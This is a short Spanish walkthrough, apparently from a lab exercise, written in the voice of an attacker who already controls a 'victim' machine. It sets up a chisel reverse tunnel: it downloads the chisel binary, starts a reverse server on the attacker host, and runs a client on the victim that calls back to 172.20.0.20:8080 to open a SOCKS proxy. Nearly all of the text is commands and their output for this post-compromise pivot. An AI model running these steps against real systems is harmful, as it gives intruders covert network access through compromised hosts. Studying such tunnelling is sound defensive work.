-hola soy el atacante rastreador ahora ya estando dentro del sistema utilizare chisel para una reverse shell


-primero instalamos el binario en la maquina atacante


-instalamos wget primero si no lo tienes: (Si no deja como en mi caso)
puedes usar curl

┌──(root㉿8314deb831e2)-[/]
└─# curl -L https://github.com/jpillora/chisel/releases/download/v1.10.0/chisel_1.10.0_linux_amd64.gz -o chisel.gz
  % Total    % Received % Xferd  Average Speed  Time    Time    Time   Current
                                 Dload  Upload  Total   Spent   Left   Speed
  0      0   0      0   0      0      0      0                              0
100  3.55M 100  3.55M   0      0  2.69M      0   00:01   00:01              0

┌──(root㉿8314deb831e2)-[/]
└─#

podemos verificarlo con un simple ls


┌──(root㉿8314deb831e2)-[/]
└─# ls
bin   chisel.gz  etc   lib    media  opt       proc  run   srv  tmp  var
boot  dev        home  lib64  mnt    pass.txt  root  sbin  sys  usr

┌──(root㉿8314deb831e2)-[/]
└─#

ahora descomprimimos el binario

┌──(root㉿8314deb831e2)-[/]
└─# gunzip chisel.gz

┌──(root㉿8314deb831e2)-[/]
└─#

movemos y ponemos el nombre limpio

mv chisel_1.10.0_linux_amd64 chisel 2>/dev/null || mv chisel.gz_extracted chisel 2>/dev/null || chmod +x chisel

ahora damos permisos de ejecucion

┌──(root㉿8314deb831e2)-[/]
└─# chmod +x chisel

┌──(root㉿8314deb831e2)-[/]
└─#

ahora solo falta arrancar el servidor con el siguiente comando

┌──(root㉿8314deb831e2)-[/]
└─# ./chisel server -p 8080 --reverse
2026/03/27 07:56:48 server: Reverse tunnelling enabled
2026/03/27 07:56:48 server: Fingerprint 2Y44YH3+joazvy28HO2jghaZG1Uab9n2ScMDuAlcEdI=
2026/03/27 07:56:48 server: Listening on http://0.0.0.0:8080


desde la maquina victima a la que ya tenemos acceso volvemos a utilizar chisel

root@ad0559c021f9:/# ./chisel client 172.20.0.20:8080 R:socks &
[1] 175
root@ad0559c021f9:/# 2026/03/27 09:03:29 client: Connecting to ws://172.20.0.20:8080
2026/03/27 09:03:29 client: Connected (Latency 619.342µs)




